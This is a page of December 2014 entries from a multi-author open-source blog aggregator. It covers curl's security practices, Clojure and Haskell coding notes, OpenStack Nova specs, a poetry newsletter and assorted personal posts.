Recent blog entries

21 Dec 2014 ole   » (Journeyer)

Girl 0.8.0 ("Cinnamon Girl")

The GNOME Internet Radio Locator 0.8.0 ("Cinnamon Girl") release is dedicated to Christmas and the music of Neil Young.


21 Dec 2014 marnanel   » (Journeyer)

Write a story about the sum...

A primary school test asked me "write a story about the sum 6+4=10". I had no idea what it was asking me to do, so I made a guess and wrote "One day 6+4=10 went for a walk. Then it came back. The end."

This entry was originally posted at http://marnanel.dreamwidth.org/319582.html. Please comment there using OpenID.

Syndicated 2014-12-20 23:56:35 from Monument

20 Dec 2014 broonie   » (Journeyer)

Adventures with ARM server

I recently got a CubieTruck with a terabyte SSD to use as a general always on server. This being an ARM board rather than a PC (with a rather nice form factor – it’s basically the same size as a SSD) you’d normally expect a blog post about it to include instructions for kernels and patches and so on but with these systems and current Debian testing there’s no need – Debian works out of the box (including our standard kernel) on it, the instructions worked easily and I now have a new machine sitting quietly in the corner serving away. Sadly it being a dual core A7 it’s not got the grunt to replace my kernel build test system, an ARM allmodconfig takes eleven and a bit hours as opposed to a little less than twenty minutes on my desktop (which does draw well over an order of magnitude more power doing it), but otherwise you’d never notice the difference when using the system.

The upshot of all this is that actually there’s no real adventure at all; for systems like these where the system vendors and the communities around them are doing the right things and working well with upstream things just work as you’d expect with minimal effort.

The one thing that’s noticeably different from installing on a PC and really could do with improving is that instead of being shipped as part of the board the boot firmware has to be written to a SD card, something that could be addressed as easily as simply shipping a suitably programmed SD card in the box even without any other modification of the hardware, though on board flash would be even nicer.

Syndicated 2014-12-20 18:57:06 from Technicalities

19 Dec 2014 Stevey   » (Master)

Switched to using attic for backups

Even though seeing the word attic reminds me too much of leaking roofs and CVS, I've switched to using the attic backup tool.

I want a simple system which will take incremental backups, perform duplication-elimination (to avoid taking too much space), support encryption, and be fast.

I stopped using backup2l because the .tar.gz files were too annoying, and it was too slow. I started using obnam because I respect Lars and his exceptionally thorough testing-regime, but had to stop using it when things started getting "too slow".

I'll document the usage/installation in the future. For the moment the only annoyance is that it is contained in the Jessie archive, not the Wheezy one. Right now only 2/19 of my hosts are Jessie.

Syndicated 2014-12-19 13:51:55 from Steve Kemp's Blog

16 Dec 2014 marnanel   » (Journeyer)

Region mapper

Something I've wanted to do for a while: You know those sites where you can fill in which states/counties/whatever you've visited? I'd like to generalise that. You could zoom to a particular area and it would say "counties of Wales" or "police force areas of Wales" or "wards of Salford" or whatever. Then when you chose one you could colour the regions in as you wished, and make a key. And then you could save them as SVG or PNG, both with enough metadata that you could reload them back into the site and get your editable state back. Some sort of integration with Wikimedia Commons would be nice too. What do you think?

This entry was originally posted at http://marnanel.dreamwidth.org/319179.html. Please comment there using OpenID.

Syndicated 2014-12-16 21:37:55 from Monument

16 Dec 2014 rodrigo   » (Master)

GObservableCollection

In the last year working at Xamarin, I have learned lots of new things (.NET, Cocoa, …), and since the beginning of that, I was thinking on bringing some of that nice stuff to GNOME, but didn’t really had the chance to finish anything. But, fortunately, being free now (on vacation), I finally finished the 1st thing: GObservableCollection, a thread-safe collection implementation which emits signals on changes.

It is based on ideas from .NET’s ObservableCollection and concurrent collections, which I’ve used successfully for building a multi-thread data processing app (with one thread updating the collection and another consuming it), so I thought it would be a good addition to GLib’s API. This class can be used on single-threaded apps to easily get notifications for changes in a collection, and in multi-threaded ones for, as mentioned above, easily share data between different threads (as can be seen on the simple test I wrote).

This is the 1st working version, so for sure it will need improvements, but instead of keeping it private for a few more months, I thought it would be better getting some feedback before I submit it as a patch for GLib’s GIO (if that’s the best place for it, which I guess it is).

Syndicated 2014-12-16 19:25:24 from Rodrigo Moya

16 Dec 2014 dan   » (Master)

core.async with aleph

(More sledge retrospective)

There was a point about three weeks ago when I thought I had a working audio player, then I tried using it on the phone and I got awkward screeches every thirty seconds through my stereo when I told it to play Ziggy Stardust. No, I’m not talking about David Bowie’s voice here, this was genuine “a dog ate my CD” style digital audio corruption. The problem seemed to appear only on Wifi: I could replicate it on my laptop, but it didn’t show up on localhost and it didn’t show up over an ssh tunnel: I suspect it was something related to buffering/backpressure, and facing the prospect of debugging Java code wth locks in it I punted and decided to try switching HTTP server instead.

Documentation on HTTP streaming from core.async channels with Aleph is kind of sparse, at least insofar as it is lacking a simple example of the kind of thing that should work. So here is my simple example of the kind of thing that worked for me: wrap the channel in a call to manifold.stream/->source and make sure that the things received on it are byte-array

(defn transcode-handler [request pathname]
  {:status 200
   :headers {"content-type" "audio/ogg"
             "x-hello" "goodbye"}
   :body (manifold/->source (transcode-chan pathname))})

(from server.clj )

I’m sure there are other things you could put on the channel that would also work, but I don’t know what. java.nio.ByteBuffer doesn’t seem to be one of them, but I’m only going on git commit history and a very fuzzy recollection of what I was doing that day, it might be that I did something else wrong.

Syndicated 2014-12-16 07:34:29 from diary at Telent Netowrks

16 Dec 2014 marnanel   » (Journeyer)

marnanel @ 2014-12-16T01:59:00

Gentle Readers
a newsletter made for sharing
volume 2, number 7
15th December 2014: the strangest whim
What I’ve been up to

I've been dividing my time between writing, contacting potential literary agents, and being asleep-- this last because they're trying me with a new antidepressant. So far it seems to be going well, but time will tell.

Two special offers for your attention, especially if you're looking for last-minute ideas for presents:

1) Because my partner Kit and I are still both too ill to work, I've reissued Time Blew Away Like Dandelion Seed, a collection of over a hundred of my poems. You can buy the paperback from Lulu. A signed and numbered hardback edition is also in the works: I'll let you know when it's ready. (The best regular way of supporting Gentle Readers, and me, financially is still through Patreon.)

2) My good friend Katie, who is a talented photographer as well as a nursing student, was due to study in the Netherlands next semester, but then she was unexpectedly sent to Finland instead. The Finnish cost of living is rather greater than the Dutch, so she is selling prints of her work to make up the budget shortfall. Please do go and check them out.

A poem of mine

FOR NIGHT CAN ONLY HIDE

When once I stop and take account of these
that God has granted me upon the earth,
the loves, the friends, the work, that charm and please
these things I count inestimable worth;
when once I stop, I learn that I am rich
beyond the dreams of emperors and kings
and light is real, and real these riches which
exceed the worth of all material things...
   when thus I stop, I cannot understand
   when few and feeble sunbeams cannot find
   their way into that drab and dreary land,
   the darkness of the middle of my mind.
yet darkness cannot take away my joy,
for night can only hide, and not destroy.

Something wonderful

The City of Westminster is one of the towns that make up Greater London. In 1672, its population was growing very fast, and builders were anxious to buy land for housing. George Villiers, the Duke of Buckingham, owned a mansion in Westminster called York House, and he agreed to sell it for demolition and redevelopment. The price he named was £30,000-- around £6 million in modern money-- plus one extra condition: all the streets built on the land had to be named after him.

The developers agreed, and set to work. Soon they had built George Street, Villiers Street, Duke Street, and Buckingham Street, at which point they were running out of naming possibilities, with one small alley yet to be named. Thus, in a moment of desperate lateral thinking, they gave it the ingenious name of Of Alley.

Something from someone else

Chesterton wrote quite a few poems about depression. I like this one particularly because it starts humorously-- literally using gallows humour-- but once it's drawn you in, it ends on a serious point about hope. Ballades are a difficult form, but Chesterton makes it look easy, though in fact he's made it even harder for himself by his choice of rhymes. It's conventional to address a prince at the end of a ballade, who is often assumed to be the Prince of Darkness (i.e. Satan): thus the end of the poem is about the downfall of evil, and perhaps the Second Coming.

BALLADE OF SUICIDE
by G K Chesterton

The gallows in my garden, people say,
Is new and neat and adequately tall.
I tie the noose on in a knowing way
As one that knots his necktie for a ball;
But just as all the neighbours— on the wall—
Are drawing a long breath to shout "Hurray!"
The strangest whim has seized me... After all
I think I will not hang myself today.

To-morrow is the time I get my pay—
My uncle's sword is hanging in the hall—
I see a little cloud all pink and gray—
Perhaps the rector's mother will NOT call—
I fancy that I heard from Mr. Gall
That mushrooms could be cooked another way—
I never read the works of Juvenal—
I think I will not hang myself today.

The world will have another washing day;
The decadents decay; the pedants pall;
And H. G. Wells has found that children play,
And Bernard Shaw discovered that they squall;
Rationalists are growing rational—
And through thick woods one finds a stream astray,
So secret that the very sky seems small—
I think I will not hang myself today.

Prince, I can hear the trumpet of Germinal,
The tumbrils toiling up the terrible way;
Even today your royal head may fall—
I think I will not hang myself today. 

Colophon

Gentle Readers is published on Mondays and Thursdays, and I want you to share it. The archives are at https://gentlereaders.uk, and so is a form to get on the mailing list. If you have anything to say or reply, or you want to be added or removed from the mailing list, I’m at thomas@thurman.org.uk and I’d love to hear from you. The newsletter is reader-supported; please pledge something if you can afford to, and please don't if you can't. ISSN 2057-052X. Love and peace to you all.

This entry was originally posted at http://marnanel.dreamwidth.org/318874.html. Please comment there using OpenID.

Syndicated 2014-12-16 04:17:50 (Updated 2014-12-16 04:20:09) from Monument

15 Dec 2014 bagder   » (Master)

Can curl avoid to be in a future funnily named exploit that shakes the world?

During this year we’ve seen heartbleed and shellshock strike (and a  few more big flaws that I’ll skip for now). Two really eye opening recent vulnerabilities in projects with many similarities:

  1. Popular corner stones of open source stacks and internet servers
  2. Mostly run and maintained by volunteers
  3. Mature projects that have been around since “forever”
  4. Projects believed to be fairly stable and relatively trustworthy by now
  5. A myriad of features, switches and code that build on many platforms, with some parts of code only running on a rare few
  6. Written in C in a portable style

Does it sound like the curl project to you too? It does to me. Sure, this description also matches a slew of other projects but I lead the curl development so let me stay here and focus on this project.

cURLAre we in jeopardy? I honestly don’t know, but I want to explain what we do in our project in order to minimize the risk and maximize our ability to find problems on our own before they become serious attack vectors somewhere!

previous flaws

There’s no secret that we have let security problems slip through at times. We’re right now working toward our 143rd release during our around 16 years of life-time. We have found and announced 28 security problems over the years. Looking at these found problems, it is clear that very few security problems are discovered quickly after introduction. Most of them linger around for several years until found and fixed. So, realistically speaking based on history: there are security bugs still in the code, and they have probably been present for a while already.

code reviews and code standards

We try to review all patches from people without push rights in the project. It would probably be a good idea to review all patches before they go in for real, but that just wouldn’t work with the (lack of) man power we have in the project while we at the same time want to develop curl, move it forward and introduce new things and features.

We maintain code standards and formatting to keep code easy to understand and follow. We keep individual commits smallish for easier review now or in the future.

test cases

As simple as it is, we test that the basic stuff works. We don’t and can’t test everything but having test cases for most things give us the confidence to change code when we see problems as we then remain fairly sure things keep working the same way as long as the test go through. In projects with much less test coverage, you become much more conservative with what you dare to change and that also makes you more vulnerable.

We always want more test cases and we want to improve on how we always add test cases when we add new features and ideally we should also add new test cases when we fix bugs so that we know that we don’t introduce any such bug again in the future.

static code analyzes

We regularly scan our code base using static code analyzers. Both clang-analyzer and coverity are good tools, and they help us by pointing out code that look wrong or suspicious. By making sure we have very few or no such flaws left in the code, we minimize the risk. A static code analyzer is better than run-time tools for cases where they can check code flows that are hard to repeat in my local environment.

valgrind

bike helmetValgrind is an awesome tool to detect memory problems in run-time. Leaks or just stupid uses of memory or related functions. We have our test suite automatically use valgrind when it runs tests in case it is present and it helps us make sure that all situations we test for are also error-free from valgrind’s point of view.

autobuilds

Building and testing curl on a plethora of platforms non-stop is also useful to make sure we don’t depend on behaviors of particular library implementations or non-standard features and more. Testing it all is basically the only way to make sure everything keeps working over the years while we continue to develop and fix bugs. We would course be even better off with more platforms that would test automatically and with more developers keeping an eye on problems that show up there…

code complexity

Arguably, one of the best ways to avoid security flaws and bugs in general, is to keep the source code as simple as possible. Complex functions need to be broken down into smaller functions that are possible to read and understand. A good way to identify functions suitable for fixing is pmccabe,

essential third parties

curl and libcurl are usually built to use a whole bunch of third party libraries in order to perform all the functionality. In order to not have any of those uses turn into a source for trouble we must of course also participate in those projects and help them stay strong and make sure that we use them the proper way that doesn’t lead to any bad side-effects.

You can help!

All this takes time, energy and system resources. Your contributions and help will be appreciated where ever among these tasks that you can insert any. We could do more of all this, more often and more thorough if we only were more people involved!

Syndicated 2014-12-15 22:21:07 from daniel.haxx.se

15 Dec 2014 badvogato   » (Master)

It's Monday. guess y'all know that already. A debt was piled on my desk $10,176.00 from labor dept. of New Jersey and none of website on its letter works...
For more information visit: http://lwd.dol.state.nj.us/labor/ui/content/overpayment.html NOT FOUND.

OR ELECTRONIC PAYMENT MAY BE MADE AT
https://www1.state.nj.us/TYTR_LBR_Claims/jsp/Login.jsp
'Site is taking too long ...'

go Christie go for 2016 US OF A.!

mesg sent to MDC to check out gobank. also submit my resume to Oracle@Trenton, fondly recall Oracle acct manager was telling the audience about his ex-job, 'In the business world, the customer is your King. But on my last job, guess what? Our customer is more or less wrong to fall into your hands in the first place...' Good humor had for all at the time...no more ?

15 Dec 2014 dan   » (Master)

Using the HTML5 audio element in Om

A quick one: if you want to render the HTML5 audio element with Om and do stuff with the events it raises, you will find that the obvious answer is not the right one. Specifically, this doesn’t work

(dom/audio #js {:controls true
                :autoPlay true
		:ref "player"
                :src bits
		:onEnded #(do-something)
               })

This might be because React has to be taught about each event that each element can trigger and it doesn’t know about this one, or it might be because (it is alleged that) event handling in React is done by placing a single event handler on the top-level component and then expecting events on subelements to bubble up. According to Stack Overflow, audio events don’t bubble

The workaround is to add the event listener explicitly in IDidMount, and to call addEventListener with its third parameter true, meaning that the event is captured by the parent before it even gets gets to the sub-element to be swallowed. Like this

Syndicated 2014-12-15 00:07:51 from diary at Telent Netowrks

15 Dec 2014 dan   » (Master)

clj-webdriver with recent Clojure/Firefox

At the time I write this, the latest release of clj-webdriver is 0.6.1. There are two separate problems with this version, at least as far as I can make out

1) some kind of bug which causes it to fail with the message No such var: clojure.core.cache/through. I haven’t tracked this to its root cause but am guessing that the [org.clojure/core.cache "0.5.0"] in clj-webdriver’s project.clj was too old a version for some other dependency I am pulling in. I added an explicit [org.clojure/core.cache “0.6.4”] in my project and that seems to have fixed it. See clj-webdriver issue 132

2) The version of Selenium it pulls in is 2.39, which is too old to work properly with even the vaguely recent version of firefox I’m using (33.1.1). Fixing this is again just a matter of adding the more recent versions of Selenium stuffz as explicit dependencies in project.clj

With those two changes clj-webdriver now seems pretty happy and I can start adding some basic smoke tests to Sledge so that I don’t have to manually test client-side behaviours whenever I change it

Done: use reference cursors instead of channels for enqueuing/dequeing tracks

Next up: use a channel for xhr search instead of quite so many callbacks

Forthcoming: more work on UI/UX. Add tabs to switch between search view and play queue, unify the different-for-no-good-reason “search” and “filters”.

The branch/commit policy from hereon in is

  • it is a bug if master doesn’t pass regression tests on my machine
  • but there could be any kind of rubbish on branches
  • but I firmly subscribe to the Kanban notion of limiting work-in-progress, so will be striving to keep each of these branches short-lived or to declare them moribund at the earliest opportunity

Note that the tests currently depend on having a music collection containing at least four tracks by Queen. This is not ideal and I will fix it some day but in the meantime you’ll just have to work around it somehow. Maybe try leaving a USB stick in the car for two weeks or something

Syndicated 2014-12-14 23:06:29 from diary at Telent Netowrks

15 Dec 2014 mikal   » (Journeyer)

Ghost




ISBN: 9781416520870
LibraryThing
Trigger warning, I suppose.











This like a Tom Clancy book, but with weirder sex, much of it non-consensual. Also, not as well thought through or as well researched or as believable. I couldn't bring myself to finish it.

Tags for this post: book john_ringo terrorism nuclear
Related posts: Citadel; Hell's Faire; Princess of Wands; East of the Sun, West of the Moon; Watch on the Rhine; Cally's War


Comment

Syndicated 2014-12-14 15:48:00 from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

14 Dec 2014 mikal   » (Journeyer)

How are we going with Nova Kilo specs after our review day?

Time for another summary I think, because announcing the review day seems to have caused a rush of new specs to be filed (which wasn't really my intention, but hey). We did approve a fair few specs on the review day, so I think overall it was a success. Here's an updated summary of the state of play:



API



API (EC2)

  • Expand support for volume filtering in the EC2 API: review 104450.
  • Implement tags for volumes and snapshots with the EC2 API: review 126553 (fast tracked, approved).


Administrative

  • Actively hunt for orphan instances and remove them: review 137996 (abandoned); review 138627.
  • Check that a service isn't running before deleting it: review 131633.
  • Enable the nova metadata cache to be a shared resource to improve the hit rate: review 126705 (abandoned).
  • Implement a daemon version of rootwrap: review 105404.
  • Log request id mappings: review 132819 (fast tracked).
  • Monitor the health of hypervisor hosts: review 137768.
  • Remove the assumption that there is a single endpoint for services that nova talks to: review 132623.


Block Storage

  • Allow direct access to LVM volumes if supported by Cinder: review 127318.
  • Cache data from volumes on local disk: review 138292 (abandoned); review 138619.
  • Enhance iSCSI volume multipath support: review 134299.
  • Failover to alternative iSCSI portals on login failure: review 137468.
  • Give additional info in BDM when source type is "blank": review 140133.
  • Implement support for a DRBD driver for Cinder block device access: review 134153.
  • Refactor ISCSIDriver to support other iSCSI transports besides TCP: review 130721 (approved).
  • StorPool volume attachment support: review 115716.
  • Support Cinder Volume Multi-attach: review 139580 (approved).
  • Support iSCSI live migration for different iSCSI target: review 132323 (approved).


Cells



Containers Service



Database



Hypervisor: Docker



Hypervisor: FreeBSD

  • Implement support for FreeBSD networking in nova-network: review 127827.


Hypervisor: Hyper-V



Hypervisor: Ironic



Hypervisor: VMWare

  • Add ephemeral disk support to the VMware driver: review 126527 (fast tracked, approved).
  • Add support for the HTML5 console: review 127283.
  • Allow Nova to access a VMWare image store over NFS: review 126866.
  • Enable administrators and tenants to take advantage of backend storage policies: review 126547 (fast tracked, approved).
  • Enable the mapping of raw cinder devices to instances: review 128697.
  • Implement vSAN support: review 128600 (fast tracked, approved).
  • Support multiple disks inside a single OVA file: review 128691.
  • Support the OVA image format: review 127054 (fast tracked, approved).


Hypervisor: libvirt



Instance features



Internal

  • A lock-free quota implementation: review 135296.
  • Automate the documentation of the virtual machine state transition graph: review 94835.
  • Fake Libvirt driver for simulating HW testing: review 139927 (abandoned).
  • Flatten Aggregate Metadata in the DB: review 134573 (abandoned).
  • Flatten Instance Metadata in the DB: review 134945 (abandoned).
  • Implement a new code coverage API extension: review 130855.
  • Move flavor data out of the system_metadata table in the SQL database: review 126620 (approved).
  • Move to polling for cinder operations: review 135367.
  • PCI test cases for third party CI: review 141270.
  • Transition Nova to using the Glance v2 API: review 84887.
  • Transition to using glanceclient instead of our own home grown wrapper: review 133485 (approved).


Internationalization

  • Enable lazy translations of strings: review 126717 (fast tracked).


Networking



Performance

  • Dynamically alter the interval nova polls components at based on load and expected time for an operation to complete: review 122705.


Scheduler

  • A nested quota driver API: review 129420.
  • Add a filter to take into account hypervisor type and version when scheduling: review 137714.
  • Add an IOPS weigher: review 127123 (approved, implemented); review 132614.
  • Add instance count on the hypervisor as a weight: review 127871 (abandoned).
  • Allow extra spec to match all values in a list by adding the ALL-IN operator: review 138698 (fast tracked, approved).
  • Allow limiting the flavors that can be scheduled on certain host aggregates: review 122530 (abandoned).
  • Allow the remove of servers from server groups: review 136487.
  • Convert get_available_resources to use an object instead of dict: review 133728 (abandoned).
  • Convert the resource tracker to objects: review 128964 (fast tracked, approved).
  • Create an object model to represent a request to boot an instance: review 127610 (approved).
  • Decouple services and compute nodes in the SQL database: review 126895 (approved).
  • Enable adding new scheduler hints to already booted instances: review 134746.
  • Fix the race conditions when migration with server-group: review 135527 (abandoned).
  • Implement resource objects in the resource tracker: review 127609.
  • Improve the ComputeCapabilities filter: review 133534.
  • Isolate Scheduler DB for Filters: review 138444.
  • Isolate the scheduler's use of the Nova SQL database: review 89893.
  • Let schedulers reuse filter and weigher objects: review 134506 (abandoned).
  • Move select_destinations() to using a request object: review 127612 (approved).
  • Persist scheduler hints: review 88983.
  • Refactor allocate_for_instance: review 141129.
  • Stop direct lookup for host aggregates in the Nova database: review 132065 (abandoned).
  • Stop direct lookup for instance groups in the Nova database: review 131553 (abandoned).
  • Support scheduling based on more image properties: review 138937.
  • Trusted computing support: review 133106.


Scheduling



Security

  • Make key manager interface interoperable with Barbican: review 140144 (fast tracked, approved).
  • Provide a reference implementation for console proxies that uses TLS: review 126958 (fast tracked, approved).
  • Strongly validate the tenant and user for quota consuming requests with keystone: review 92507.


Service Groups



Sheduler

  • Add soft affinity support for server group: review 140017 (approved).


Tags for this post: openstack kilo blueprint spec nova
Related posts: Specs for Kilo; One week of Nova Kilo specifications; Compute Kilo specs are open; Specs for Kilo; Juno nova mid-cycle meetup summary: slots; Juno nova mid-cycle meetup summary: nova-network to Neutron migration

Comment

Syndicated 2014-12-14 15:07:00 (Updated 2014-12-15 00:08:30) from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

14 Dec 2014 mikal   » (Journeyer)

Soft deleting instances and the reclaim_instance_interval in Nova

I got asked the other day how the reclaim_instance_interval in Nova works, so I thought I'd write it up here in case its useful to other people.

First off, there is a periodic task run the nova-compute process (or the computer manager as a developer would know it), which runs every reclaim_instance_interval seconds. It looks for instances in the SOFT_DELETED state which don't have any tasks running at the moment for the hypervisor node that nova-compute is running on.

For each instance it finds, it checks if the instance has been soft deleted for at least reclaim_instance_interval seconds. This has the side effect from my reading of the code that an instance needs to be deleted for at least reclaim_instance_Interval seconds before it will be removed from disk, but that the instance might be up to approximately twice that age (if it was deleted just as the periodic task ran, it would skip the next run and therefore not be deleted for two intervals).

Once these conditions are met, the instance is deleted from disk.

Tags for this post: openstack nova instance delete
Related posts: Juno nova mid-cycle meetup summary: nova-network to Neutron migration; Juno Nova PTL Candidacy; Juno nova mid-cycle meetup summary: scheduler; Juno nova mid-cycle meetup summary: ironic; Review priorities as we approach juno-3; Thoughts from the PTL

Comment

Syndicated 2014-12-14 13:51:00 from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

14 Dec 2014 marnanel   » (Journeyer)

major rode ahead

I can remember going through that stage fairly clearly. I was about five, and I'd read a cracker joke at a party that said:
Knock knock.
Who's there?
Major.
Major who?
Major road ahead.
This is because there used to be road signs that said "major road ahead", but I didn't know this-- they'd been obsolete before I was born. I assumed it meant that a major in the army rode ahead of the rest of the soldiers. That seemed a bit odd, but when I told my parents the joke, they laughed. Can anything compare to that moment when you make someone else laugh on purpose? So I told the joke again the next day, and it somehow wasn't funny any more. Clearly, then, I had to learn new jokes, but how? I determined to experiment by changing the joke slowly to see whether I could work out what made the original joke funny. My first attempt was:
Knock knock.
Who's there?
Major.
Major who?
Major curtains.
Of course when I told my parents that joke they laughed as well because of the surrealism, which made constructing a hypothesis about the nature of humour rather difficult.

This entry was originally posted at http://marnanel.dreamwidth.org/318668.html. Please comment there using OpenID.

Syndicated 2014-12-14 13:29:19 from Monument

13 Dec 2014 hacker   » (Master)

HOWTO: Quick 7-Zip Trick to Encrypt Your Files with Non-Interactive Mode

I have a lot of data that I archive away on a regular basis, both on my “PC” machines and my mobile devices OTA. I needed a secure, reproducible way to secure those data with a very strong, complex password using extremely tight compression. Unfortunately, p7zip on Linux and 7-Zip for Windows don’t permit a […]

Related posts:
  1. HOWTO: How to Fix a Forgotten Windows Administrator or User Password with Sticky Keys I pulled some of my very old Windows VMs out...
  2. Using fdupes to Solve the Data Duplication Problem: I’ve got some dupes! Well, 11.6 hours later after scanning the NAS with fdupes,...
  3. HOWTO: Configure XChat Azure on OS X to connect to Freenode using SASL + Tor With all the recent news about the NSA, Prism Surveillance...

Syndicated 2014-12-13 20:59:55 from random neuron misfires

13 Dec 2014 dmarti   » (Master)

Look who's beating the advertising business at the BS game.

I read Bob Hoffman's blog, and, fine, I have to agree that advertising has a certain amount of bullshit in it. But the sad news is that old-fashioned brand bullshit is losing out to web-scale Big Data bullshit. Seriously, ad people, you're getting beat by a bunch of computer programmers. That's weak. Our idea of bullshitting is stuff like Look at the the ROI to the company if you buy me a faster computer! We're just tech people, no formal training in any of this stuff. We shouldn't be able to out-bullshit anybody. But I guess that as soon as you throw TECHNOLOGY and STATISTICS into the mix, ad people are all, whatever you say!

Bwah ha ha.

How about a simple example of the kind of thing that gets through?

I'll start a used car lot, and hire a statistician. She stands around with a clipboard and watches the people who walk in. 20% of the people kick at least one tire. Out of the tire-kickers, 10% end up buying a car. Out of the rest of the people, only 1% end up buying a car. So, out of every 1000 visitors:

20: kick a tire and buy a car.

180: kick a tire and don't buy a car.

8: don't kick a tire, buy a car anyway.

798: neither kick a tire nor buy a car.

What do I do with this information besides sell 28 cars? Maybe, not much. But let's say I need to hire my nephew. So he comes in to work and starts handing a live rat to everyone who kicks a tire. Now, half of the people who get a rat just run away.

100: kick a tire, get a rat, run away.

10: kick a tire, get a rat, buy a car.

90: kick a tire, get a rat, don't run away but don't buy a car.

8: don't kick a tire, buy a car anyway.

798: neither kick a tire nor buy a car.

Now, are the rats a good idea? If you want to go by common sense, probably not. I'm selling 18 cars instead of 28. But let's say the nephew and the statistician work together to justify the rats. The statistican can do multi-touch attribution on car sales. How does that work?

Simply speaking, channels that appear more often in converting paths than to no-converting paths receive a higher weight, which in turn allows them to claim more conversion credits and thus revenue.

By multi-touch attribution, the rat plan is a huge win. There are 18 converting paths and there's a rat on 10 of them.

So, did I convince you that we should be handing out rats to more customers? Probably not. But use real-world messy data, dress it up with a few more graphs and some more mathematical-sounding language, and make the rats digital? Hell yeah.

Syndicated 2014-12-13 15:29:11 from Don Marti

13 Dec 2014 shlomif   » (Master)

Tech Tip: Make Jamendo Playback Work in Firefox on Mageia Linux

If you’re having a problem playing Jamendo tracks after pressing the “Listen” button (such as on this page) on Firefox running on Linux, then try to install the packages «gstreamer0.10-plugins-bad gstreamer0.10-plugins-good gstreamer0.10-plugins-ugly gstreamer0.10-mpeg gstreamer0.10-ffmpeg» (relevant to Mageia; try their equivalent in other distributions), restart Firefox and try again. The problem is that Firefox needs extra gstreamer plugins to play proprietary formats in HTML audio and video elements. Cheers!

Licence

You can reuse this entry under the Creative Commons Attribution 3.0 Unported licence, or at your option any later version. See the instructions of how to comply with it.

Syndicated 2014-12-13 12:15:09 from shlomif

12 Dec 2014 dkg   » (Master)

a10n for l10n

The abbreviated title above means "Appreciation for Localization" :)

I wanted to say a word of thanks for the awesome work done by debian localization teams. I speak English, and my other language skills are weak. I'm lucky: most software I use is written by default in a language that I can already understand.

The debian localization teams do great work in making sure that packages in debian gets translated into many other languages, so that many more people around the world can take advantage of free software.

I was reminded of this work recently (again) with the great patches submitted to GnuPG and related packages. The changes were made by many different people, and coordinated with the debian GnuPG packaging team by David Prévot.

This work doesn't just help debian and its users. These localizations make their way back upstream to the original projects, which in turn are available to many other people.

If you use debian, and you speak a language other than english, and you want to give back to the community, please consider joining one of the localization teams. They are a great way to help out our project's top priorities: our users and free software.

Thank you to all the localizers!

(this post was inspired by gregoa's debian advent calendar. i won't be posting public words of thanks as frequently or as diligently as he does, any more than i'll be fixing the number of RC bugs that he fixes. This are just two of the ways that gregoa consistently leads the community by example. He's an inspiration, even if living up to his example is a daunting challenge.)

Syndicated 2014-12-12 23:00:00 from Weblogs for dkg

12 Dec 2014 AlanHorkan   » (Master)

OpenRaster and OpenDocument

OpenRaster is a file format for layered images. The OpenRaster specification is small and relatively easy to understand, essentially each layer is represented by a PNG image, and other information is contained written in XML and it is all contained in a Zip Archive. OpenRaster is inspired by OpenDocument.
OpenDocument is a group of different file formats, including word processing, spreadsheets, and vector drawings. The specification is huge and continues to grow. It cleverly reuses many existing standards, avoiding repeating old mistakes, and building on existing knowledge.

OpenRaster can and should reuse more from OpenDocument.



It is easy to say but putting it into practice is harder. OpenDocument is a huge standard so where to begin? I am not even talking about the OpenDocument Graphics (.odg) specifically but more generally than that. It is best that show it with an example. So I created an example OpenRaster image with some fractal designs. You can unzip this file and see that like a standard OpenRaster file it contains:


fractal.ora  
 ├ mimetype
 ├ stack.xml
 ├ data/
 │  ├ layer0.png
 │  ├ layer1.png
 │  ├ layer2.png
 │  ├ layer3.png
 │  ├ layer4.png
 │  └ layer5.png
 ├ Thumbnails/
 │  └ thumbnail.png
 └ mergedimage.png

It also unusually contains two other files manifest.xml content.xml. Despite the fact that OpenDocument is a huge standard the minimum requirements for a valid OpenDocument file comes down to just a few files. The manifest is a list of all the files contained in the archive, and content.xml is the main body of the file, and does some of the things that stack.xml does in OpenRaster (for the purposes of this example, it does many other things too). The result of these two extra files, a few kilobytes of extra XML, is that the image is both OpenRaster AND OpenDocument "compatible" too. Admittedly it is an extremely small tiny subset of OpenDocument but it allows a small intersection between the two formats. You can test it for yourself, rename the file from .ora .odg and LibreOffice can open the image.

To better demonstrate the point, I wanted to "show it with code!" I decided to modify Pinta (a Paint program written in GTK and C#) and my changes are on GitHub. The relevant file is Pinta/Pinta.Core/ImageFormats/OraFormat.cs which is the OpenRaster importer and exporter.

This is a proof of concept, it is limited and not useful to ordinary users. The point is only to show that OpenRaster could borrow more from OpenDocument. It is a small bit of compatibility that is not important by itself but being part of the larger group could be useful.

Syndicated 2014-12-12 04:03:51 from Alan Horkan

12 Dec 2014 joey   » (Master)

a brainfuck monad

Inspired by "An ASM Monad", I've built a Haskell monad that produces brainfuck programs. The code for this monad is available on hackage, so cabal install brainfuck-monad.

Here's a simple program written using this monad. See if you can guess what it might do:

import Control.Monad.BrainFuck

demo :: String
demo = brainfuckConstants $ \constants -> do
        add 31
        forever constants $ do
                add 1
                output

Here's the brainfuck code that demo generates: >+>++>+++>++++>+++++>++++++>+++++++>++++++++>++++++++++++++++++++++++++++++++<<<<<<<<[>>>>>>>>+.<<<<<<<<]

If you feed that into a brainfuck interpreter (I'm using hsbrainfuck for my testing), you'll find that it loops forever and prints out each character, starting with space (32), in ASCIIbetical order.

The implementation is quite similar to the ASM monad. The main differences are that it builds a String, and that the BrainFuck monad keeps track of the current position of the data pointer (as brainfuck lacks any sane way to manipulate its instruction pointer).

newtype BrainFuck a = BrainFuck (DataPointer -> ([Char], DataPointer, a))

type DataPointer = Integer

-- Gets the current address of the data pointer.
addr :: BrainFuck DataPointer
addr = BrainFuck $ \loc -> ([], loc, loc)

Having the data pointer address available allows writing some useful utility functions like this one, which uses the next (brainfuck opcode >) and prev (brainfuck opcode <) instructions.

-- Moves the data pointer to a specific address.
setAddr :: Integer -> BrainFuck ()
setAddr n = do
        a <- addr
        if a > n
                then prev >> setAddr n
                else if a < n
                        then next >> setAddr n
                        else return ()

Of course, brainfuck is a horrible language, designed to be nearly impossible to use. Here's the code to run a loop, but it's really hard to use this to build anything useful..

-- The loop is only entered if the byte at the data pointer is not zero.
-- On entry, the loop body is run, and then it loops when
-- the byte at the data pointer is not zero.
loopUnless0 :: BrainFuck () -> BrainFuck ()
loopUnless0 a = do
        open
        a
        close

